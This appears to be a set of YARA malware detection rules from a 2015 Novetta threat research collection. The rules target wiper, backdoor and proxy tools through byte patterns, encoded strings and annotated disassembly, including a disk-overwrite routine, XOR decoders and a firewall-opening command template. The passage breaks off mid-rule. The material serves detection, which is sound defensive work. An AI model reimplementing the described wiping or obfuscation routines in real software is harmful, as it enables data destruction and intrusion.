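            68 FC 81 00 10          push    offset a_docx   ; ".docx"
            56                      push    esi             ; Str1
            FF D7                   call    edi ; _wcsnicmp
            83 C4 0C                add     esp, 0Ch
            85 C0                   test    eax, eax
            0F 84 46 02 00 00       jz      loc_100017D5
            6A 04                   push    4               ; MaxCount
            68 F0 81 00 10          push    offset a_docm   ; ".docm"
            56                      push    esi             ; Str1
            FF D7                   call    edi ; _wcsnicmp
            83 C4 0C                add     esp, 0Ch
            85 C0                   test    eax, eax
            0F 84 31 02 00 00       jz      loc_100017D5
            6A 04                   push    4               ; MaxCount
            68 E4 81 00 10          push    offset a_wpd    ; ".wpd"
            56                      push    esi             ; Str1
            FF D7                   call    edi ; _wcsnicmp
        */
        // The comment above documents two variants the fixed bytes "FF D? 83 C4 0C" cannot
        // match: a direct call (E8 rel32) and a two-argument wcscmp cleanup (add esp, 8).
        // Both are admitted here as alternatives; the original form was
        //   {68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] ... (three times)}
        // and every match of that form is still a match of this one.
        $a = {68 [4] 5? (FF D? | E8 ?? ?? ?? ??) 83 C4 (0C | 08) 85 C0 0F 84 [4] [0-2] 68 [4] 5? (FF D? | E8 ?? ?? ?? ??) 83 C4 (0C | 08) 85 C0 0F 84 [4] [0-2] 68 [4] 5? (FF D? | E8 ?? ?? ?? ??) 83 C4 (0C | 08) 85 C0 0F 84 }

        $ext1 = ".wpd" wide nocase
        $ext2 = ".doc" wide nocase
        $ext3 = ".hwp" wide nocase

    condition:
        2 of ($ext*)
        and $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

// SYSTEMTIME forgery: rand() % 12 + 1 (wMonth), % 28 + 1 (wDay), % 24 (wHour), % 60 (wMinute),
// % 60, each stored into a SYSTEMTIME at fixed ebp offsets. The call displacements are wildcarded.
rule WhiskeyCharlie
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "47ff4f73738acc2f8433dccb2caf980d7444d723ccf2968d69f88f8f96405f96"

    strings:
        /*
            66 89 55 DC             mov     [ebp+SystemTime.wYear], dx
            E8 1E 16 00 00          call    _rand
            6A 0C                   push    0Ch
            99                      cdq
            59                      pop     ecx
            F7 F9                   idiv    ecx
            42                      inc     edx
            66 89 55 DE             mov     [ebp+SystemTime.wMonth], dx
            E8 0E 16 00 00          call    _rand
            6A 1C                   push    1Ch
            99                      cdq
            59                      pop     ecx
            F7 F9                   idiv    ecx
            42                      inc     edx
            66 89 55 E2             mov     [ebp+SystemTime.wDay], dx
            E8 FE 15 00 00          call    _rand
            6A 18                   push    18h
            99                      cdq
            59                      pop     ecx
            F7 F9                   idiv    ecx
            66 89 55 E4             mov     [ebp+SystemTime.wHour], dx
            E8 EF 15 00 00          call    _rand
            6A 3C                   push    3Ch
            99                      cdq
            59                      pop     ecx
            F7 F9                   idiv    ecx
            66 89 55 E6             mov     [ebp+SystemTime.wMinute], dx
            E8 E0 15 00 00          call    _rand
            6A 3C                   push    3Ch
            99                      cdq
            59                      pop     ecx
            F7 F9                   idiv    ecx
        */
        $a = {66 89 55 DC E8 [4] 6A 0C 99 59 F7 F9 42 66 89 55 DE E8 [4] 6A 1C 99 59 F7 F9 42 66 89 55 E2 E8 [4] 6A 18 99 59 F7 F9 66 89 55 E4 E8 [4] 6A 3C 99 59 F7 F9 66 89 55 E6 E8 [4] 6A 3C 99 59 F7 F9 }

    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

// Byte-wise XOR decryption loop with a 32-byte rotating key (the B9 1E 00 00 00 shift loop),
// or two of three "=====...=====" wide marker strings. The same routine, fully specified,
// is $xorInLoop in DestructiveHardDriveTool1 below.
rule WhiskeyDelta
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group trig@novetta.com"
        Source = "41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635"

    strings:
        /*
            F3 A5                   rep movsd
            8B 7C 24 30             mov     edi, [esp+28h+arg_4]
            85 FF                   test    edi, edi
            7E 3A                   jle     short loc_402018
            8B 74 24 2C             mov     esi, [esp+28h+arg_0]
            8A 44 24 08             mov     al, [esp+28h+var_20]
            53                      push    ebx
            8A 4C 24 21             mov     cl, [esp+2Ch+var_B]
            8A 5C 24 2B             mov     bl, [esp+2Ch+var_1]
            32 C1                   xor     al, cl
            8A 0C 32                mov     cl, [edx+esi]
            32 C3                   xor     al, bl
            32 C8                   xor     cl, al
            88 0C 32                mov     [edx+esi], cl
            B9 1E 00 00 00          mov     ecx, 1Eh
            8A 5C 0C 0C             mov     bl, [esp+ecx+2Ch+var_20]
            88 5C 0C 0D             mov     [esp+ecx+2Ch+var_1F], bl
            49                      dec     ecx
            83 F9 FF                cmp     ecx, 0FFFFFFFFh
            7F F2                   jg      short loc_402000
            42                      inc     edx
        */
        $decryption = {F3 A5 8B 7C 24 30 85 FF 7E ?? 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F ?? 42 }

        $s1 = "=====IsFile=====" wide
        $s2 = "=====4M=====" wide
        $s3 = "=====IsBackup=====" wide

    condition:
        2 of ($s*)
        or $decryption in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// From CERT report https://www.us-cert.gov/ncas/alerts/TA14-353A
//
// The header guard repeated in the rules below accepts, by leading bytes:
//   uint16(0) == 0x5A4D      "MZ"            PE
//   uint16(0) == 0xCFD0      D0 CF           OLE2 compound document
//   uint16(0) == 0xC3D4      D4 C3           pcap
//   uint32(0) == 0x46445025  "%PDF"
//   uint32(1) == 0x6674725C  "\rtf" at offset 1, i.e. "{\rtf"
rule SMB_Worm_Tool
{
    strings:
        $STR1 = "Global\\FwtSqmSession106829323_S-1-5-19"
        $STR2 = "EVERYONE"
        $STR3 = "y0uar3@s!llyid!07,ou74n60u7f001"
        $STR4 = "\\KB25468.dat"

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

rule Lightweight_Backdoor1
{
    strings:
        $STR1 = "NetMgStart"
        $STR2 = "Netmgmt.srg"

    condition:
        (uint16(0) == 0x5A4D) and all of them
}

rule LightweightBackdoor2
{
    strings:
        $STR1 = "prxTroy" ascii wide nocase

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

// Backdoors 3-5 match a file name built on the stack one byte at a time
// (mov byte ptr [ebp-xx], imm8 sequences), which defeats plain string scanning.
rule LightweightBackdoor3
{
    strings:
        $strl = { C6 45 E8 64 C6 45 E9 61 C6 45 EA 79 C6 45 EB 69 C6 45 EC 70 C6 45 ED 6D C6 45 EE 72 C6 45 EF 2E C6 45 F0 74 C6 45 F1 62 C6 45 F2 6C } // 'dayipmr.tbl' being moved to ebp

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

rule LightweightBackdoor4
{
    strings:
        $strl = { C6 45 F4 61 C6 45 F5 6E C6 45 F6 73 C6 45 F7 69 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 } // 'ansi.nls' being moved to ebp

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

rule LightweightBackdoor5
{
    strings:
        $strl = { C6 45 F4 74 C6 45 F5 6C C6 45 F6 76 C6 45 F7 63 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 } // 'tlvc.nls' being moved to ebp

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

// Byte-transform loop: mov dl,[eax]; two 8-bit immediate-arithmetic ops (80 /r ib) with the
// immediates 4Eh and 79h in either order; mov [eax],dl. Both orders are required.
rule LightweightBackdoor6
{
    strings:
        $STR1 = { 8A 10 80 ?? 4E 80 ?? 79 88 10}
        $STR2 = { 8A 10 80 ?? 79 80 ?? 4E 88 10}

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

rule ProxyTool1
{
    strings:
        $STR1 = "pmsconfig.msi" wide
        $STR2 = "pmslog.msi" wide

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and any of them
}

// The trailing 00 is the unencoded terminator; the decoder in XORDecodeA7 below stops at the
// string length, so only the text bytes carry the 0xA7 key.
rule ProxyTool2
{
    strings:
        $STR1 = { 82 F4 DE D4 D3 C2 CA F5 C8 C8 D3 82 FB F4 DE D4 D3 C2 CA 94 95 FB D4 D1 C4 CF C8 D4 D3 89 C2 DF C2 87 8A CC 87 00 } // '%SystemRoot%\System32\svchost.exe -k' xor A7

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

// Fully specified form of the XOR-0xA7 decode loop that XORDecodeA7 below matches with wildcards.
rule ProxyTool3
{
    strings:
        $STR2 = {8A 04 17 8B FB 34 A7 46 88 02 83 C9 FF}

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and $STR2
}

// $str1 is "mov byte ptr [esp+disp32], imm8" with disp32 below 200h (the immediate itself is
// not part of the pattern); more than 300 of them means a large stack buffer built one byte
// at a time. $xorInLoop is the complete rotating-key XOR routine of WhiskeyDelta above.
rule DestructiveHardDriveTool1
{
    strings:
        $str0= "MZ"
        $str1 = {c6 84 24 ?? ( 00 | 01 ) 00 00 }
        $xorInLoop = { 83 EC 20 B9 08 00 00 00 33 D2 56 8B 74 24 30 57 8D 7C 24 08 F3 A5 8B 7C 24 30 85 FF 7E 3A 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F F2 42 88 44 24 0C 3B D7 7C D0 5B 5F 5E 83 C4 20 C3 }

    condition:
        $str0 at 0 and $xorInLoop and #str1 > 300
}

/*
  Disabled in the source set. It is a loose form of the prologue matched by
  DestructiveTargetCleaningTool2's $secureWipe (the constants D3h, 2Ch, 95h, 6Ah, 07h stored
  to the stack in that order).

rule DestructiveTargetCleaningTool1
{
    strings:
        $s1 = {d3000000 [4] 2c000000 [12] 95000000 [4] 6a000000 [8] 07000000}
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
*/

// One whole overwrite routine. Reading the fixed bytes: a 10000h-byte buffer is allocated
// (68 00 00 01 00), filled with rep stosd (B9 00 40 00 00 dwords), the target is opened with
// GENERIC_READ|GENERIC_WRITE (68 00 00 00 C0) and OPEN_EXISTING (6A 03), and the buffer is
// written repeatedly; the FF D5 calls are presumably SetFilePointer (cf.
// DestructiveTargetCleaningTool7). Parenthesised alternatives absorb per-build jump displacements.
rule DestructiveTargetCleaningTool2
{
    strings:
        $secureWipe = {
            83 EC 34 53 55 8B 6C 24 40 56 57 83 CE FF 55 C7 44 24 2C D3 00 00 00 C7 44 24 30 2C 00 00 00 89 74 24 34 89 74 24 38 C7 44 24 3C 95 00 00 00 C7 44 24 40 6A 00 00 00 89 74 24 44 C7 44 24 14 07 00 00 00 FF 15 ?? ?? ?? ?? 3B C6 89 44 24 1C 0F 84 (D8 | d9) 01 00 00 33 FF 68 00 00 01 00 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF 89 5C 24 14 0F 84 (BC | BD) 01 00 00 8B 44 24 1C A8 01 74 0A 24 FE 50 55 FF 15 ?? ?? ?? ?? 8B 44 24 4C 2B C7 74 20 48 74 0F 83 E8 02 75 1C C7 44 24 10 03 00 00 00 EB 12 C7 44 24 10 01 00 00 00 89 74 24 28 EB 04 89 7C 24 10 8B 44 24 10 89 7C 24 1C 3B C7 0F 8E ( 5C | 5d ) 01 00 00 8D 44 24 28 89 44 24 4C EB 03 83 CE FF 8B 4C 24 4C 8B 01 3B C6 74 17 8A D0 B9 00 40 00 00 8A F2 8B FB 8B C2 C1 E0 10 66 8B C2 F3 AB EB ( 13 | 14) 33 F6 (E8 | ff 15) ?? ?? ?? ?? 88 04 1E 46 81 FE 00 00 01 00 7C ( EF | ee) 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 C0 55 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 0F 84 FA 00 00 00 8D 44 24 20 50 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A 02 6A 00 6A FF 56 FF D5 8D 4C 24 18 6A 00 51 6A 01 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 8B 44 24 24 8B 54 24 20 33 FF 33 DB 85 C0 7C 5A 7F 0A 85 D2 76 54 EB 04 8B 54 24 20 8B CA BD 00 00 01 00 2B CF 1B C3 85 C0 7F 0A 7C 04 3B CD 73 04 2B D7 8B EA 8B 44 24 14 8D 54 24 18 6A 00 52 55 50 56 FF 15 ?? ?? ?? ??
            8B 6C 24 18 8B 44 24 24 03 FD 83 D3 00 3B D8 7C BE 7F 08 8B 54 24 20 3B FA 72 B8 8B 2D ?? ?? ?? ?? 8B 5C 24 10 8B 7C 24 1C 8D 4B FF 3B F9 75 17 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 4C 8B 6C 24 48 47 83 C1 04 3B FB 8B 5C 24 14 89 7C 24 1C 89 4C 24 4C 0F 8C ( AE | AD) FE FF FF 6A 00 55 E8 ?? ?? ?? ?? 83 C4 08 53 FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 83 C4 34 C3
        }

    condition:
        $secureWipe
}

// Command-line strings of the installer component. NOTE(review): generic installer-style
// tokens; there is no header guard here, so expect hits on unrelated files.
rule DestructiveTargetCleaningTool3
{
    strings:
        $S1_CMD_Arg = "/install" fullword
        $S2_CMD_Parse= "\"%s\" /install \"%s\"" fullword
        $S3_CMD_Builder= "\"%s\" \"%s\" \"%s\" %s" fullword

    condition:
        all of them
}

// Self-deleting batch file fragments (zz%d.bat); "del" must occur exactly twice.
rule DestructiveTargetCleaningTool4
{
    strings:
        $BATCH_SCRIPT_LN1_0 = "goto x" fullword
        $BATCH_SCRIPT_LN1_1 = "del" fullword
        $BATCH_SCRIPT_LN2_0 = "if exist" fullword
        $BATCH_SCRIPT_LN3_0 = ":x" fullword
        $BATCH_SCRIPT_LN4_0 = "zz%d.bat" fullword

    condition:
        (#BATCH_SCRIPT_LN1_1 == 2) and all of them
}

// 27 bytes from (per its name) a zlib-compressed embedded DLL; opaque, matched as-is.
rule DestructiveTargetCleaningTool5
{
    strings:
        $MCU_DLL_ZLIB_COMPRESSED2 = { 5C EC AB AE 81 3C C9 BC D5 A5 42 F4 54 91 04 28 34 34 79 80 6F 71 D5 52 1E 2A 0D }

    condition:
        $MCU_DLL_ZLIB_COMPRESSED2
}

// Start of an embedded INF, both as stored (Enc) and after decoding (Dec). The decoded form
// ends in the ASCII bytes of "verclvid.exe".
rule DestructiveTargetCleaningTool6
{
    strings:
        $MCU_INF_StartHexDec = {010346080A30D63633000B6263750A5052322A00103D1B570A30E67F2A00130952690A503A0D2A000E00A26E15104556766572636C7669642E657865}
        $MCU_INF_StartHexEnc = {6C3272386958BF075230780A0A54676166024968790C7A6779588F5E47312739310163615B3D59686721CF5F2120263E1F5413531F1E004543544C55}

    condition:
        $MCU_INF_StartHexEnc or $MCU_INF_StartHexDec
}

// Import names used to truncate files plus a fragment of the overwrite routine ($c is a
// sub-sequence of DestructiveTargetCleaningTool2's $secureWipe). PE header is checked
// via e_lfanew ("PE" at uint32(0x3c)).
rule DestructiveTargetCleaningTool7
{
    strings:
        $a = "SetFilePointer"
        $b = "SetEndOfFile"
        $c = {75 17 56 ff 15 ?? ?? ?? ?? 6a 00 6a 00 6a 00 56 ff D5 56 ff 15 ?? ?? ?? ?? 56}

    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}

// $license is the UTF-16 "Portions copyright Robert de Bath, Joris van Rantwijk, Delian"
// text with its dialog-resource framing; $PuTTY is UTF-16 "PuTTY". A PE carrying the
// PuTTY license text but no "PuTTY" string is presumably a rebranded PuTTY-derived build.
rule DestructiveTargetCleaningTool8
{
    strings:
        $license = {E903FFFF820050006F007200740069006F006E007300200063006F007000790072006900670068007400200052006F006200650072007400200064006500200042006100740068002C0020004A006F007200690073002000760061006E002000520061006E007400770069006A006B002C002000440065006C00690061006E000000000000000250000000000A002200CE000800EA03FFFF8200}
        $PuTTY= {50007500540054005900}

    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $license and not $PuTTY
}

// All three patterns are required. The two flagged by the original author as hitting
// CRT code ($heapCreateFunction_0 looks like the CRT heap initialisation: HeapCreate,
// __heap_select, 3F8h; $getMajorMinorLinker reads MajorLinkerVersion/MinorLinkerVersion
// at NT header +1Ah/+1Bh) add little on their own; $openServiceManager carries the
// specificity, so do not loosen "all of them".
rule Malwareusedbycyberthreatactor1
{
    strings:
        // vvv---- this sig hits on a legit CRT function it seems.
        $heapCreateFunction_0 = {33C06A003944240868001000000F94C050FF15????????85C0A3???????07436E893FEFFFF83F803A3???????0750D68F8030000E8??00000059EB0A83F8027518E8????000085C0750FFF35???????0FF15???????033C0C36A0158C3}
        $heapCreateFunction = { 55 8B EC B8 2C 12 00 00 E8 ?? ?? FF FF 8D 85 68 FF FF FF 53 50 C7 85 68 FF FF FF 94 00 00 00 FF 1? ?? ?? ?? ?0 85 C0 74 1A 83 BD 78 FF FF FF 02 75 11 83 BD 6C FF FF FF 05 72 08 6A 01 58 E9 02 01 00 00 8D 85 D4 ED FF F6 89 01 00 00 05 06 8? ?? ?? ?? 0F F1 5? ?? ?? ?? 08 5C 00 F8 4D 00 00 00 03 3D B8 D8 DD 4E DF FF F3 89 DD DF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 5D 4E DF FF F6 A1 65 06 8? ?? ?? ?? 0E 8? ?? ?0 00 08 3C 40 C8 5C 07 50 88 D8 5D 4E DF FF FE B4 98 D8 56 4F EF FF F6 80 40 10 00 05 05 3F F1 5? ?? ?? ?? 03 89 D6 4F EF FF F8 D8 D6 4F EF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 56 4F EF FF F5 08 D8 5D 4E DF FF F5 0E 8? ?? ?? ?? ?5 95 93 BC 37 43 E6 A2 C5 0E 8? ?? ?? ?? ?5 93 BC 35 97 43 04 08 BC 83 81 87 40 E8 03 93 B7 50 48 81 9E B0 14 13 81 97 5F 26 A0 A5 35 0E 8? ?? ?0 00 08 3C 40 C8 3F 80 27 41 D8 3F 80 37 41 88 3F 80 17 41 38 D4 5F C5 0E 89 8F EF FF F8 07 DF C0 65 91 BC 08 3C 00 35 BC 9C}
        // vvv---- this sig hits on a legit CRT function it seems.
        $getMajorMinorLinker = {568B7424086A00832600FF15???????06681384D5A75148B483C85C9740D03C18A481A880E8A401B8846015EC3}
        $openServiceManager = {FF15???0?0?08B?885??74????????????????5?FF15???0?0?08B?????0?0?08BF?85F?74}

    condition:
        all of them
}

// FTP-like command verbs with a leading underscore plus one stack store; all required.
rule Malwareusedbycyberthreatactor2
{
    strings:
        $str1 = "_quit"
        $str2 = "_exe"
        $str3 = "_put"
        $str4 = "_got"
        $str5 = "_get"
        $str6 ="_del"
        $str7 = "_dir"
        $str8 = { C7 44 24 18 1F F7}

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

// push eax / push 80h / push 0FFFFh / push ecx / mov [esp+1Ch], 8B3Ah.
rule Malwareusedbycyberthreatactor3
{
    strings:
        $STR1 = { 50 68 80 00 00 00 68 FF FF 00 00 51 C7 44 24 1C 3a 8b 00 00 }

    condition:
        (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C)
        and all of them
}

// yara rules that can cross boundaries between the various sets/types... more general detection signatures

import "pe"

// Any one of several strings reused across families. $e is the firewall command format
// (presumably "cmd.exe /c netsh firewall add portopening TCP %d ..." once the %s pieces are
// filled in). $f becomes "GetVolumeInformationW" after the '.'/' ' stripping done by the
// routine StringDotSimplified matches below.
rule wiper_unique_strings
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        company = "novetta"

    strings:
        $a = "C!@I#%VJSIEOTQWPVz034vuA"
        $b = "BAISEO%$2fas9vQsfvx%$"
        $c = "1.2.7.f-hanba-win64-v1"
        $d = "md %s&copy %s\\*.* %s"
        $e = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
        $f = "Ge.tVol. .umeIn..for mati.onW"

    condition:
        $a or $b or $c or $d or $e or $f
}

// XOR-0xA7 encoded strings with their unencoded NUL terminators:
//   $scr      -> ".scr"
//   $explorer -> "explorer.exe"
//   $kernel32 -> "kernel32.dll"
rule wiper_encoded_strings
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        company = "novetta"

    strings:
        $scr = {89 D4 C4 D5 00 00 00}
        $explorer = {E2 DF D7 CB C8 D5 C2 D5 89 C2 DF C2 00 00 00 }
        $kernel32 = {CC C2 D5 C9 C2 CB 94 95 89 C3 CB CB 00 00 }

    condition:
        $scr or $explorer or $kernel32
}

rule createP2P
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        $ = "CreatP2P Thread" wide

    condition:
        any of them
}

// The shared firewall-command format string on its own (TangoAlfa requires one more string).
rule firewallOpener
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""

    condition:
        any of them
}

// sigs for the various cross-family codes

import "pe"

// Rolling checksum step: add ((val >> 16) & 0x7FFF) to the running value, then rotate it by
// (value & 0xF) bits. Registers are wildcarded; the constants 10h, 7FFFh, 0Fh are fixed.
rule Caracachs: sharedcode
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"

    strings:
        /*
            B9 10 00 00 00          mov     ecx, 10h        ; ecx = 16
            8B 06                   mov     eax, [esi]      ; eax = lastValue
            C1 EA 10                shr     edx, 10h        ; edx = val >> 16
            81 E2 FF 7F 00 00       and     edx, 7FFFh      ; edx = (val >> 16) & 0x7FFF
            03 C2                   add     eax, edx        ; eax = ((val >> 16) & 0x7FFF) + lastValue
            8B D0                   mov     edx, eax        ; edx = ((val >> 16) & 0x7FFF) + lastValue
            8B F8                   mov     edi, eax        ; edi = ((val >> 16) & 0x7FFF) + lastValue
            83 E2 0F                and     edx, 0Fh        ; edx = (((val >> 16) & 0x7FFF) + lastValue) & 0xF
            2B CA                   sub     ecx, edx        ; ecx = 16 - ((((val >> 16) & 0x7FFF) + lastValue)) & 0xF
            D3 EF                   shr     edi, cl         ; edi = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF)
            8B CA                   mov     ecx, edx        ; ecx = (((val >> 16) & 0x7FFF) + lastValue) & 0xF
            D3 E0                   shl     eax, cl         ; eax = (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF)
            0B F8                   or      edi, eax        ; edi = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) | (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF)
            89 3E                   mov     [esi], edi      ; pLastValue = (((val >> 16) & 0x7FFF) + lastValue) >> ((16 - ((val >> 16) & 0x7FFF) + lastValue) & 0xF) | (((val >> 16) & 0x7FFF) + lastValue) << ((((val >> 16) & 0x7FFF) + lastValue) & 0xF)
        */
        $a = {B? 10 00 00 00 8B ?? C1 ?? 10 81 ?? FF 7F 00 00 03 ?? 8B ?? 8B ?? 83 ?? 0F 2B ?? D3 ?? 8B ?? D3 ?? 0B ?? 89 ?? }

    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// Copies a string while dropping '.' (2Eh) and ' ' (20h): the de-obfuscation step for the
// dotted API names such as "Lo.adL ibr.ar yW" used by the dynamic API loader.
rule StringDotSimplified: sharedcode
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"

    strings:
        /*
            F3 AB                   rep stosd
            80 3A 00                cmp     byte ptr [edx], 0
            74 15                   jz      short loc_404170
            8A 02                   mov     al, [edx]
            3C 2E                   cmp     al, 2Eh
            74 07                   jz      short loc_404168
            3C 20                   cmp     al, 20h
            74 03                   jz      short loc_404168
            88 06                   mov     [esi], al
            46                      inc     esi
        */
        $a = { F3 AB 80 ?? 00 74 ?? 8A 02 3C 2E 74 ?? 3C 20 74 ?? 88 06 46 }

    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// Fake-TLS server hello: cipher-suite id compared against 0C000h and 35h to pick a value
// (100h or 180h) that is then pushed as a port number (hostshort).
rule FakeTLS_ServerHelloGetSelectedCipher: sharedcode
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"

    strings:
        /*
            24 10                   and     al, 10h
            0C 10                   or      al, 10h
            89 07                   mov     [edi], eax
            66 8B 44 24 14          mov     ax, [esp+0Ch+wCipherSuiteID]
            66 3D 00 C0             cmp     ax, 0C000h
            73 34                   jnb     short loc_4067C1
            66 2D 35 00             sub     ax, 35h
            66 F7 D8                neg     ax
            1B C0                   sbb     eax, eax
            24 80                   and     al, 80h
            05 00 01 00 00          add     eax, 100h
            8B D8                   mov     ebx, eax
            53                      push    ebx             ; hostshort
        */
        $a = { 24 10 0C 10 89 ?? 66 8? [3] 66 3? 00 C0 73 ?? 66 2? 35 00 66 F7 ?? 1B ?? 2? 80 0? 00 01 00 00 8B ?? 5? }

    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// In-place XOR 0xA7 string decoder bounded by strlen() (repne scasb / not ecx / dec ecx).
// The key matches the encoded strings in ProxyTool2 and wiper_encoded_strings; ProxyTool3
// holds this same code without wildcards.
rule XORDecodeA7: sharedcode
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_"

    strings:
        /*
            8A 04 17                mov     al, [edi+edx]
            8B FB                   mov     edi, ebx
            34 A7                   xor     al, 0A7h
            46                      inc     esi
            88 02                   mov     [edx], al
            83 C9 FF                or      ecx, 0FFFFFFFFh
            33 C0                   xor     eax, eax
            42                      inc     edx
            F2 AE                   repne scasb
            F7 D1                   not     ecx
            49                      dec     ecx
            3B F1                   cmp     esi, ecx
        */
        $a = { 8A [2] 8B ?? 34 A7 46 88 ?? 83 ?? FF 33 ?? 4? F2 AE F7 ?? 4? 3B ??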
